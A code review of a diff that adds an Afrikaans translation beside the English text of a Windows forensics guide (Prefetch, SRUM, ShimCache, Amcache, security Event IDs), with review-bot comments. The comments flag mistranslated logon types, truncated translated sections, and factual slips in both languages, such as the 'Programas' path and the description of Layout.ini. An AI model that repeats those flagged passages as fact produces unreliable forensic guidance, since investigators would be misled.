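Review bot: the added sentence loses its verb at "wat 'n gebruiker **moontlik binnekort sal toegang**"; "waartoe 'n gebruiker **moontlik binnekort toegang sal verkry**" completes it. The source's bold on "fetch the necessary resources needed to display content" is also dropped in the translation.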
|
||||
|
||||
Windows prefetch consists of creating **caches of the executed programs** to be able to load them faster. These caches as created as `.pf` files inside the path: `C:\Windows\Prefetch`. There is a limit of 128 files in XP/VISTA/WIN7 and 1024 files in Win8/Win10.
|
||||
Windows prefetch bestaan uit die skep van **kasgeheues van die uitgevoerde programme** om hulle vinniger te kan laai. Hierdie kasgeheues word geskep as `.pf`-lêers binne die pad: `C:\Windows\Prefetch`. Daar is 'n limiet van 128 lêers in XP/VISTA/WIN7 en 1024 lêers in Win8/Win10.
|
||||
|
||||
The file name is created as `{program_name}-{hash}.pf` (the hash is based on the path and arguments of the executable). In W10 these files are compressed. Do note that the sole presence of the file indicates that **the program was executed** at some point.
|
||||
Die lêernaam word geskep as `{program_naam}-{hash}.pf` (die hash is gebaseer op die pad en argumente van die uitvoerbare lêer). In W10 is hierdie lêers saamgedruk. Let daarop dat die blootwesigheid van die lêer aandui dat **die program op 'n stadium uitgevoer is**.
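Review bot: "blootwesigheid" is not a word; "die blote teenwoordigheid van die lêer" renders "the sole presence of the file". The file-name pattern is also half-translated: `{program_naam}-{hash}.pf` translates one placeholder and not the other; keep `{program_name}-{hash}.pf` as on the source line, since it is a pattern, not prose.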
|
||||
|
||||
The file `C:\Windows\Prefetch\Layout.ini` contains the **names of the folders of the files that are prefetched**. This file contains **information about the number of the executions**, **dates** of the execution and **files** **open** by the program.
|
||||
|
||||
To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd):
|
||||
Die lêer `C:\Windows\Prefetch\Layout.ini` bevat die **name van die gids van die lêers wat geprefetch word**. Hierdie lêer bevat **inligting oor die aantal uitvoerings**, **datums** van die uitvoering en **lêers** **wat oop** is deur die program.
|
||||
|
||||
Om hierdie lêers te ondersoek, kan jy die hulpmiddel [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd) gebruik:
|
||||
```bash
|
||||
.\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder"
|
||||
```
|
||||
|
||||
![](<../../../.gitbook/assets/image (487).png>)
|
||||
|
||||
### Superprefetch
|
||||
|
||||
**Superprefetch** has the same goal as prefetch, **load programs faster** by predicting what is going to be loaded next. However, it doesn't substitute the prefetch service.\
|
||||
This service will generate database files in `C:\Windows\Prefetch\Ag*.db`.
|
||||
**Superprefetch** het dieselfde doel as prefetch, **laai programme vinniger** deur te voorspel wat die volgende gelaaide item sal wees. Dit vervang egter nie die prefetch-diens nie.\
|
||||
Hierdie diens sal databasislêers genereer in `C:\Windows\Prefetch\Ag*.db`.
|
||||
|
||||
In these databases you can find the **name** of the **program**, **number** of **executions**, **files** **opened**, **volume** **accessed**, **complete** **path**, **timeframes** and **timestamps**.
|
||||
In hierdie databasisse kan jy die **naam** van die **program**, **aantal** **uitvoerings**, **geopen** **lêers**, **toegang tot** **volume**, **volledige** **pad**, **tydperke** en **tydstempels** vind.
|
||||
|
||||
You can access this information using the tool [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/).
|
||||
Jy kan hierdie inligting kry deur die hulpmiddel [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/) te gebruik.
|
||||
|
||||
### SRUM
|
||||
|
||||
**System Resource Usage Monitor** (SRUM) **monitors** the **resources** **consumed** **by a process**. It appeared in W8 and it stores the data in an ESE database located in `C:\Windows\System32\sru\SRUDB.dat`.
|
||||
**System Resource Usage Monitor** (SRUM) **monitor** die **hulpbronne** **verbruik** **deur 'n proses**. Dit het in W8 verskyn en stoor die data in 'n ESE-databasis wat in `C:\Windows\System32\sru\SRUDB.dat` geleë is.
|
||||
|
||||
It gives the following information:
|
||||
Dit gee die volgende inligting:
|
||||
|
||||
* AppID and Path
|
||||
* User that executed the process
|
||||
* Sent Bytes
|
||||
* Received Bytes
|
||||
* Network Interface
|
||||
* Connection duration
|
||||
* Process duration
|
||||
* AppID en Pad
|
||||
* Gebruiker wat die proses uitgevoer het
|
||||
* Gestuurde bytes
|
||||
* Ontvangsbytes
|
||||
* Netwerkinterface
|
||||
* Verbindingsduur
|
||||
* Prosesduur
|
||||
|
||||
This information is updated every 60 mins.
|
||||
|
||||
You can obtain the date from this file using the tool [**srum\_dump**](https://github.com/MarkBaggett/srum-dump).
|
||||
Hierdie inligting word elke 60 minute opgedateer.
|
||||
|
||||
Jy kan die datum uit hierdie lêer kry deur die hulpmiddel [**srum\_dump**](https://github.com/MarkBaggett/srum-dump) te gebruik.
|
||||
```bash
|
||||
.\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum
|
||||
```
|
||||
|
||||
### AppCompatCache (ShimCache)
|
||||
|
||||
The **AppCompatCache**, also known as **ShimCache**, forms a part of the **Application Compatibility Database** developed by **Microsoft** to tackle application compatibility issues. This system component records various pieces of file metadata, which include:
|
||||
Die **AppCompatCache**, ook bekend as **ShimCache**, vorm deel van die **Application Compatibility Database** wat deur **Microsoft** ontwikkel is om programverenigbaarheidsprobleme aan te spreek. Hierdie stelselkomponent neem verskeie stukke lêermetadata op, wat insluit:
|
||||
|
||||
- Full path of the file
|
||||
- Size of the file
|
||||
- Last Modified time under **$Standard\_Information** (SI)
|
||||
- Last Updated time of the ShimCache
|
||||
- Process Execution Flag
|
||||
- Volledige pad van die lêer
|
||||
- Grootte van die lêer
|
||||
- Laaste gewysigde tyd onder **$Standard\_Information** (SI)
|
||||
- Laaste opgedateerde tyd van die ShimCache
|
||||
- Prosesuitvoeringsvlag
|
||||
|
||||
Such data is stored within the registry at specific locations based on the version of the operating system:
|
||||
Sodanige data word binne die register gestoor op spesifieke plekke gebaseer op die weergawe van die bedryfstelsel:
|
||||
|
||||
- For XP, the data is stored under `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` with a capacity for 96 entries.
|
||||
- For Server 2003, as well as for Windows versions 2008, 2012, 2016, 7, 8, and 10, the storage path is `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, accommodating 512 and 1024 entries, respectively.
|
||||
- Vir XP word die data gestoor onder `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` met 'n kapasiteit vir 96 inskrywings.
|
||||
- Vir Server 2003, sowel as vir Windows-weergawes 2008, 2012, 2016, 7, 8 en 10, is die bergpad `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, wat onderskeidelik 512 en 1024 inskrywings akkommodeer.
|
||||
|
||||
To parse the stored information, the [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) is recommended for use.
|
||||
Om die gestoorde inligting te ontleden, word die [**AppCompatCacheParser**-hulpmiddel](https://github.com/EricZimmerman/AppCompatCacheParser) aanbeveel vir gebruik.
|
||||
|
||||
![](<../../../.gitbook/assets/image (488).png>)
|
||||
|
||||
### Amcache
|
||||
|
||||
The **Amcache.hve** file is essentially a registry hive that logs details about applications that have been executed on a system. It is typically found at `C:\Windows\AppCompat\Programas\Amcache.hve`.
|
||||
Die **Amcache.hve**-lêer is in wese 'n registerhys wat besonderhede oor toepassings wat op 'n stelsel uitgevoer is, registreer. Dit word tipies gevind by `C:\Windows\AppCompat\Programas\Amcache.hve`.
|
||||
|
||||
This file is notable for storing records of recently executed processes, including the paths to the executable files and their SHA1 hashes. This information is invaluable for tracking the activity of applications on a system.
|
||||
|
||||
To extract and analyze the data from **Amcache.hve**, the [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) tool can be used. The following command is an example of how to use AmcacheParser to parse the contents of the **Amcache.hve** file and output the results in CSV format:
|
||||
Hierdie lêer is merkwaardig omdat dit rekords van onlangs uitgevoerde prosesse stoor, insluitend die paaie na die uitvoerbare lêers en hul SHA1-hashes. Hierdie inligting is van onschatbare waarde vir die opspoor van die aktiwiteit van toepassings op 'n stelsel.
|
||||
|
||||
Om die data uit **Amcache.hve** te onttrek en te analiseer, kan die [**AmcacheParser**-hulpmiddel](https://github.com/EricZimmerman/AmcacheParser) gebruik word. Die volgende opdrag is 'n voorbeeld van hoe om AmcacheParser te gebruik om die inhoud van die **Amcache.hve**-lêer te ontleden en die resultate in CSV-formaat uit te voer:
|
||||
```bash
|
||||
AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder
|
||||
```
|
||||
Onder die gegenereerde CSV-lêers is die `Amcache_Unassociated file entries` veral merkwaardig vanweë die ryk inligting wat dit verskaf oor nie-geassosieerde lêerinvoere.
|
||||
|
||||
Among the generated CSV files, the `Amcache_Unassociated file entries` is particularly noteworthy due to the rich information it provides about unassociated file entries.
|
||||
|
||||
The most interesting CVS file generated is the `Amcache_Unassociated file entries`.
|
||||
Die mees interessante CVS-lêer wat gegenereer word, is die `Amcache_Unassociated file entries`.
|
||||
|
||||
### RecentFileCache
|
||||
|
||||
This artifact can only be found in W7 in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` and it contains information about the recent execution of some binaries.
|
||||
Hierdie artefak kan slegs in W7 gevind word in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` en dit bevat inligting oor die onlangse uitvoering van sekere bineêre lêers.
|
||||
|
||||
You can use the tool [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) to parse the file.
|
||||
Jy kan die instrument [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) gebruik om die lêer te ontled.
|
||||
|
||||
### Scheduled tasks
|
||||
### Geskeduleerde take
|
||||
|
||||
You can extract them from `C:\Windows\Tasks` or `C:\Windows\System32\Tasks` and read them as XML.
|
||||
Jy kan hulle onttrek uit `C:\Windows\Tasks` of `C:\Windows\System32\Tasks` en as XML lees.
|
||||
|
||||
### Services
|
||||
### Dienste
|
||||
|
||||
You can find them in the registry under `SYSTEM\ControlSet001\Services`. You can see what is going to be executed and when.
|
||||
Jy kan hulle in die register vind onder `SYSTEM\ControlSet001\Services`. Jy kan sien wat uitgevoer gaan word en wanneer.
|
||||
|
||||
### **Windows Store**
|
||||
|
||||
The installed applications can be found in `\ProgramData\Microsoft\Windows\AppRepository\`\
|
||||
This repository has a **log** with **each application installed** in the system inside the database **`StateRepository-Machine.srd`**.
|
||||
Die geïnstalleerde programme kan gevind word in `\ProgramData\Microsoft\Windows\AppRepository\`\
|
||||
Hierdie bewaarplek het 'n **log** met **elke geïnstalleerde toepassing** in die stelsel binne die databasis **`StateRepository-Machine.srd`**.
|
||||
|
||||
Inside the Application table of this database, it's possible to find the columns: "Application ID", "PackageNumber", and "Display Name". These columns have information about pre-installed and installed applications and it can be found if some applications were uninstalled because the IDs of installed applications should be sequential.
|
||||
Binne die Toepassingstabel van hierdie databasis is dit moontlik om die kolomme te vind: "Toepassings-ID", "Pakketnommer" en "Vertoonnaam". Hierdie kolomme bevat inligting oor vooraf geïnstalleerde en geïnstalleerde toepassings en dit kan gevind word of sommige toepassings gedeïnstalleer is omdat die ID's van geïnstalleerde toepassings opeenvolgend moet wees.
|
||||
|
||||
It's also possible to **find installed application** inside the registry path: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
|
||||
And **uninstalled** **applications** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
|
||||
Dit is ook moontlik om **geïnstalleerde toepassing** te vind binne die registerpad: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
|
||||
En **gedeïnstalleerde** **toepassings** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
|
||||
|
||||
## Windows Events
|
||||
## Windows-gebeure
|
||||
|
||||
Information that appears inside Windows events are:
|
||||
Inligting wat binne Windows-gebeure verskyn, is:
|
||||
|
||||
* What happened
|
||||
* Timestamp (UTC + 0)
|
||||
* Users involved
|
||||
* Hosts involved (hostname, IP)
|
||||
* Assets accessed (files, folder, printer, services)
|
||||
* Wat gebeur het
|
||||
* Tydstempel (UTC + 0)
|
||||
* Betrokke gebruikers
|
||||
* Betrokke gasheer (gasheernaam, IP)
|
||||
* Betrokke bates (lêers, vouer, drukkers, dienste)
|
||||
|
||||
The logs are located in `C:\Windows\System32\config` before Windows Vista and in `C:\Windows\System32\winevt\Logs` after Windows Vista. Before Windows Vista, the event logs were in binary format and after it, they are in **XML format** and use the **.evtx** extension.
|
||||
Die loglêers is geleë in `C:\Windows\System32\config` voor Windows Vista en in `C:\Windows\System32\winevt\Logs` na Windows Vista. Voor Windows Vista was die gebeurtenisloglêers in binêre formaat en daarna is dit in **XML-formaat** en gebruik die **.evtx**-uitbreiding.
|
||||
|
||||
The location of the event files can be found in the SYSTEM registry in **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**
|
||||
Die ligging van die gebeurtenislêers kan gevind word in die SISTEEM-register in **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**
|
||||
|
||||
They can be visualized from the Windows Event Viewer (**`eventvwr.msc`**) or with other tools like [**Event Log Explorer**](https://eventlogxp.com) **or** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
|
||||
Dit kan gesien word vanuit die Windows-gebeurtenisleser (**`eventvwr.msc`**) of met ander instrumente soos [**Event Log Explorer**](https://eventlogxp.com) **of** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
|
||||
|
||||
## Understanding Windows Security Event Logging
|
||||
## Begrip van Windows-sekuriteitsgebeure
|
||||
|
||||
Access events are recorded in the security configuration file located at `C:\Windows\System32\winevt\Security.evtx`. This file's size is adjustable, and when its capacity is reached, older events are overwritten. Recorded events include user logins and logoffs, user actions, and changes to security settings, as well as file, folder, and shared asset access.
|
||||
Toegangsgebeure word aangeteken in die sekuriteitskonfigurasie-lêer wat geleë is by `C:\Windows\System32\winevt\Security.evtx`. Hierdie lêer se grootte is aanpasbaar, en wanneer sy kapasiteit bereik is, word ouer gebeure oorskryf. Aangetekende gebeure sluit gebruikersaanmeldings en -afmeldings, gebruikersaksies en veranderinge aan sekuriteitsinstellings in, sowel as toegang tot lêers, vouers en gedeelde bates.
|
||||
|
||||
### Key Event IDs for User Authentication:
|
||||
### Sleutel-gebeurtenis-ID's vir gebruikersverifikasie:
|
||||
|
||||
- **EventID 4624**: Indicates a user successfully authenticated.
|
||||
- **EventID 4625**: Signals an authentication failure.
|
||||
- **EventIDs 4634/4647**: Represent user logoff events.
|
||||
- **EventID 4672**: Denotes login with administrative privileges.
|
||||
- **Gebeurtenis-ID 4624**: Dui aan dat 'n gebruiker suksesvol geverifieer is.
|
||||
- **Gebeurtenis-ID 4625**: Dui op 'n mislukte verifikasie.
|
||||
- **Gebeurtenis-ID's 4634/4647**: Verteenwoordig gebruikersafmeldingsgebeure.
|
||||
- **Gebeurtenis-ID 4672**: Dui op aanmelding met administratiewe voorregte.
|
||||
|
||||
#### Sub-types within EventID 4634/4647:
|
||||
#### Subtipes binne Gebeurtenis-ID 4634/4647:
|
||||
|
||||
- **Interactive (2)**: Direct user login.
|
||||
- **Network (3)**: Access to shared folders.
|
||||
- **Batch (4)**: Execution of batch processes.
|
||||
- **Service (5)**: Service launches.
|
||||
- **Proxy (6)**: Proxy authentication.
|
||||
- **Unlock (7)**: Screen unlocked with a password.
|
||||
- **Network Cleartext (8)**: Clear text password transmission, often from IIS.
|
||||
- **New Credentials (9)**: Usage of different credentials for access.
|
||||
- **Remote Interactive (10)**: Remote desktop or terminal services login.
|
||||
- **Cache Interactive (11)**: Login with cached credentials without domain controller contact.
|
||||
- **Cache Remote Interactive (12)**: Remote login with cached credentials.
|
||||
- **Cached Unlock (13)**: Unlocking with cached credentials.
|
||||
- **Interaktief (2)**: Direkte gebruikersaanmelding.
|
||||
- **Netwerk (3)**: Toegang tot gedeelde vouers.
|
||||
- **Batch (4)**: Uitvoering van lotprosesse.
|
||||
- **Diens (5)**: Dienslansering.
|
||||
- **Proxy (6)**: Proxy-verifikasie.
|
||||
- **Ontsluit (7)**: Skerm ontgrendel met 'n wagwoord.
|
||||
- **Netwerkduidelike teks (8)**: Duidelike teks wagwoordoordrag, dikwels vanaf IIS.
|
||||
- **Nuwe legitimasie (9)**: Gebruik van verskillende legitimasie vir toegang.
|
||||
- **Verwyderde interaktief (10)**: Verwyderde skerm of terminaaldiensaanmelding.
|
||||
- **Verwyderde interaktiewe opgesluit (11)**: Aanmelding met opgeslote legitimasie sonder kontak met 'n domeinbeheerder.
|
||||
- **Verwyderde ontgrendeling (12)**: Verwyderde aanmelding met opgeslote legitimasie.
|
||||
- **Opgeslote ontgrendeling (13)**: Ontsluiting met opgeslote legitimasie.
|
||||
|
||||
#### Status and Sub Status Codes for EventID 4625:
|
||||
#### Status- en Substatuskodes vir Gebeurtenis-ID 4625:
|
||||
|
||||
- **0xC0000064**: User name does not exist - Could indicate a username enumeration attack.
|
||||
- **0xC000006A**: Correct user name but wrong password - Possible password guessing or brute-force attempt.
|
||||
- **0xC0000234**: User account locked out - May follow a brute-force attack resulting in multiple failed logins.
|
||||
- **0xC0000072**: Account disabled - Unauthorized attempts to access disabled accounts.
|
||||
- **0xC000006F**: Logon outside allowed time - Indicates attempts to access outside of set login hours, a possible sign of unauthorized access.
|
||||
- **0xC0000070**: Violation of workstation restrictions - Could be an attempt to login from an unauthorized location.
|
||||
- **0xC0000193**: Account expiration - Access attempts with expired user accounts.
|
||||
- **0xC0000071**: Expired password - Login attempts with outdated passwords.
|
||||
- **0xC0000133**: Time sync issues - Large time discrepancies between client and server may be indicative of more sophisticated attacks like pass-the-ticket.
|
||||
- **0xC0000224**: Mandatory password change required - Frequent mandatory changes might suggest an attempt to destabilize account security.
|
||||
- **0xC0000225**: Indicates a system bug rather than a security issue.
|
||||
- **0xC000015b**: Denied logon type - Access attempt with unauthorized logon type, such as a user trying to execute a service logon.
|
||||
- **0xC0000064**: Gebruikersnaam bestaan nie - Kan dui op 'n aanval van gebruikersnaamopname.
|
||||
- **0xC000006A**: Korrekte gebruikersnaam, maar verkeerde wagwoord - Moontlike wagwoord raai of brute force-poging.
|
||||
- **0xC0000234**: Gebruikersrekening gesluit - Kan volg op 'n brute force-aanval met verskeie mislukte aanmeldings.
|
||||
- **0xC0000072**: Rekening gedeaktiveer - Onbevoegde pogings om gedeaktiveerde rekeninge te benader.
|
||||
- **0xC000006F**: Aanmelding buite toegelate tyd - Dui op pogings om buite die vasgestelde aanmeldingstye toegang te verkry, 'n moontlike teken van onbevoegde toegang.
|
||||
- **0xC0000070**: Oortreding van werksplekbeperkings - Kan 'n poging wees om vanaf 'n onbevoegde plek aan te meld.
|
||||
- **0xC0000193**: Rekening verval - Toegangspogings met vervalde gebruikersrekeninge.
|
||||
- **0xC0000071**: Vervalde wagwoord - Aanmeldingspogings met verouderde wagwoorde.
|
||||
- **0xC0000133**: Tydsinkronisasieprobleme - Groot tydverskille tussen kliënt en bediener kan dui op meer gesofistikeerde aanvalle soos pass-the-ticket.
|
||||
- **0xC0000224**: Verpligte wagwoordverandering vereis - Gereelde verpligte veranderinge kan dui op 'n poging om rekeningsekuriteit te destabiliseer.
|
||||
- **0xC0000225**: Dui op 'n stelselfout eerder as 'n sekuriteitsprobleem.
|
||||
- **0xC000015b**: Geweierde aanmeldingstipe - Toegangspoging met onbevoegde aanmeldingstipe, soos 'n gebruiker wat probeer om 'n diensaanmelding uit te voer.
|
||||
|
||||
#### EventID 4616:
|
||||
- **Time Change**: Modification of the system time, could obscure the timeline of events.
|
||||
#### Gebeurtenis-ID 4616:
|
||||
- **Tydverandering**: Wysiging van die stelseltyd, kan die tydlyn van gebeure verwar.
|
||||
|
||||
#### EventID 6005 and 6006:
|
||||
- **System Startup and Shutdown**: EventID 6005 indicates the system starting up, while EventID 6006 marks it shutting down.
|
||||
#### Gebeurtenis-ID's 6005 en 6006:
|
||||
- **Stelselbegin en -afsluiting**: Gebeurtenis-ID 6005 dui op die begin van die stelsel, terwyl Gebeurtenis-ID 6006 dit aandui wanneer dit afsluit.
|
||||
|
||||
#### EventID 1102:
|
||||
- **Log Deletion**: Security logs being cleared, which is often a red flag for covering up illicit activities.
|
||||
#### Gebeurtenis-ID 1102:
|
||||
- **Logwissing**: Sekuriteitslêers wat skoongevee word, wat dikwels 'n rooi vlag is vir die bedek van onwettige aktiwiteite.
|
||||
|
||||
#### EventIDs for USB Device Tracking:
|
||||
- **20001 / 20003 / 10000**: USB device first connection.
|
||||
- **10100**: USB driver update.
|
||||
- **EventID 112**: Time of USB device insertion.
|
||||
#### Gebeurtenis-ID's vir USB-toestelopsporing:
|
||||
- **20001 / 20003 / 10000**: Eerste koppeling van USB-toestel.
|
||||
- **10100**: USB-bestuursprogramopdatering.
|
||||
- **Gebeurtenis-ID 112**: Tyd van USB-toestelinvoeging.
|
||||
|
||||
For practical examples on simulating these login types and credential dumping opportunities, refer to [Altered Security's detailed guide](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them).
|
||||
Vir praktiese voorbeelde van die simulasie van hierdie aanmeldingstipes en geleenthede vir legitimasie-onttrekking, verwys na [Altered Security se gedetailleerde gids](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them).
|
||||
|
||||
Event details, including status and sub-status codes, provide further insights into event causes, particularly notable in Event ID 4625.
|
||||
Gebeurtenisbesonderhede, insluitend status- en substatuskodes, bied verdere insig in die oorsake van gebeure, ver
|
||||
#### Stelselkraggebeure
|
||||
|
||||
### Recovering Windows Events
|
||||
EventID 6005 dui op stelselbegin, terwyl EventID 6006 afsluiting aandui.
|
||||
|
||||
To enhance the chances of recovering deleted Windows Events, it's advisable to power down the suspect computer by directly unplugging it. **Bulk_extractor**, a recovery tool specifying the `.evtx` extension, is recommended for attempting to recover such events.
|
||||
#### Logverwydering
|
||||
|
||||
### Identifying Common Attacks via Windows Events
|
||||
|
||||
For a comprehensive guide on utilizing Windows Event IDs in identifying common cyber attacks, visit [Red Team Recipe](https://redteamrecipe.com/event-codes/).
|
||||
|
||||
#### Brute Force Attacks
|
||||
|
||||
Identifiable by multiple EventID 4625 records, followed by an EventID 4624 if the attack succeeds.
|
||||
|
||||
#### Time Change
|
||||
|
||||
Recorded by EventID 4616, changes to system time can complicate forensic analysis.
|
||||
|
||||
#### USB Device Tracking
|
||||
|
||||
Useful System EventIDs for USB device tracking include 20001/20003/10000 for initial use, 10100 for driver updates, and EventID 112 from DeviceSetupManager for insertion timestamps.
|
||||
|
||||
#### System Power Events
|
||||
|
||||
EventID 6005 indicates system startup, while EventID 6006 marks shutdown.
|
||||
|
||||
#### Log Deletion
|
||||
|
||||
Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis.
|
||||
Veiligheid EventID 1102 dui op die verwydering van logboeke, 'n kritieke gebeurtenis vir forensiese analise.
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
|
|
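Review bot: the translated logon-type list under "Subtipes binne Gebeurtenis-ID 4634/4647" changes the meaning of types 10 through 13: "Remote Interactive (10)" became "Verwyderde interaktief (10)" (verwyder means removed, not remote), "Cache Interactive (11)" became "Verwyderde interaktiewe opgesluit (11)", "Cache Remote Interactive (12)" became "Verwyderde ontgrendeling (12)", and "cached" is rendered as "opgeslote" (locked) throughout; suggest "Afgeleë interaktief (10)", "Gekaste interaktief (11)", "Gekaste afgeleë interaktief (12)" and "Gekaste ontsluiting (13)". While there, these values are the Logon Type field of 4624/4634, so the heading "Sub-types within EventID 4634/4647" misleads in both languages. The Afrikaans text is also truncated: the sentence ending "oorsake van gebeure, ver" is cut off, and "Recovering Windows Events", "Identifying Common Attacks via Windows Events", "Brute Force Attacks", "Time Change" and "USB Device Tracking" have no translated body; only the bare headers "Stelselkraggebeure" and "Logverwydering" plus the 6005/6006 and 1102 sentences survive (and "Veiligheid EventID 1102" should read "Sekuriteits-EventID 1102"), so the translated page loses the bulk_extractor recovery advice and the Red Team Recipe reference. Code spans and hive names must not be translated: the prefetch template `{program_name}-{hash}.pf` became `{program_naam}-{hash}.pf`, and "the SYSTEM registry" became "die SISTEEM-register" although SYSTEM is the hive name. Pre-existing errors this pass could fix in both languages: the Amcache path reads `C:\Windows\AppCompat\Programas\Amcache.hve` but the directory is `Programs`, as in the RecentFileCache path just below it; "CVS file" should be "CSV file" and that sentence repeats the one before it; the tool is RecentFileCacheParser, as in its link target; "Superprefetch" is SuperFetch (the SysMain service); and the run count and last-run timestamps are stored in the `.pf` files themselves, which is where PECmd reads them, whereas `Layout.ini` is only the file list the defragmenter uses for layout optimisation.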
@ -1,106 +1,87 @@
|
|||
# Interesting Windows Registry Keys
|
||||
# Interessante Windows-registernøkke
|
||||
|
||||
### Interesting Windows Registry Keys
|
||||
### Interessante Windows-registernøkke
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
### **Windows Version and Owner Info**
|
||||
- Located at **`Software\Microsoft\Windows NT\CurrentVersion`**, you'll find the Windows version, Service Pack, installation time, and the registered owner's name in a straightforward manner.
|
||||
### **Windows-weergawe en eienaarinligting**
